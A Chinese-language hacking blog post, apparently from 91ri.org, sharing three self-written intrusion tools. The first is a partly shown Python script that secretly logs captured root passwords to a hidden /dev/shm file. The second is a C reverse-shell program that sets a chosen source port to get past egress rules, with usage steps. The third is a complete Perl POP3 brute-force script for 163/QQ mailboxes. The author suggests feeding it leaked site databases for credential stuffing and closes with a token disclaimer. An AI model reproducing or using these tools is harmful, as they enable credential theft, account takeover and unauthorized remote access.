摘要
0x00 渗透的很多时候,找到的工具并不适用,自己码代码才是王道,下面三个程序都是渗透时在网络上找不到合适工具,自己辛苦开发的,短小使用,求欣赏,求好评。
0x00
渗透的很多时候,找到的工具并不适用,自己码代码才是王道,下面三个程序都是渗透时在网络上找不到合适工具,自己辛苦开发的,短小使用,求欣赏,求好评。
0x01
记录root密码小工具
root.py
#!/usr/bin/python import os, sys, getpass, time current_time = time.strftime("%Y-%m-%d %H:%M") logfile="/dev/shm/.su.log" //密码获取后记录在这里 #
渗透linux拿到低权限并
0x02
设置源端口反弹shell
渗透某个linux服务器,反连时目标端口为888不行,53,80还是不行,
Ping了下百度 可以ping通,
那真相只有一个
服务器变态的限制了只能某些提供已某些端口为源端口去连接外面
比如
只允许接收对80端口的访问数据包,并以80为源端口向外回复数据。
谷歌程序无果,自己查了相关api后写了个。
client-port.c
#include <stdio.h> #i
用法:
gcc client-port.c -o port
chmod +x port
./port 你的IP 你的监听端口 本地的源端口
如 ./port http://www.91ri.org 80 80
成功反弹shell
如 ./port http://www.91ri.org 80 80
成功反弹shell 提权成功
0x03 邮箱爆破脚本
某个时候 需要爆破一批邮箱
#!/usr/bin/perl use Net::POP3; $email="pop.163.com"; //设置pop服务器地址 qq为pop.qq.com $pop = Net::POP3->new($email)or die("ERROR: Unable to initiate. "); print $pop->banner(); $pop->quit; $i=0; open(fp1,"user.txt"); @array1=<fp1>; open(fp2,"pass.txt"); @array2=<fp2>; //从文件中获取邮箱用户名及密码 foreach $a(@array1) { $u=substr($a,0,length($a)-1); $u=$u."@163.com"; foreach $b(@array2) { $p=substr($b,0,length($b)-1); print "cracked with ".$u."-----".$p."n"; $i=$i+1; $pop = Net::POP3->new($email)or die("ERROR: Unable to initiate. "); $m=$pop->login($u,$p); //尝试登录邮箱 if($m>0) { print $u."------------".$p."----"."success"."n"; $pop->quit; } //成功登录 else { print $u."------------".$p."----"."failed"."n"; $pop->quit; //登录失败 } } } print $i;
用法 将要爆破的邮箱的pop服务器写入下面这一行 默认是163邮箱
$email="pop.163.com";
再将去除掉@后面部分的邮箱地址比如[email protected] 去除后lusiyu存进去
同目录user.txt中吗,再将字典存进去pass.txt
你会说
这个有点鸡肋吧 万一邮箱的密码很复杂
呵呵
搞到了一个小站的数据,
用这个程序批量测试密码是否就是邮箱密码 呵呵
我啥都没说。
0x04
这三个程序仅供技术研究,如读者用于违法行为,本人概不负责。
http://www.91ri.org/8680.html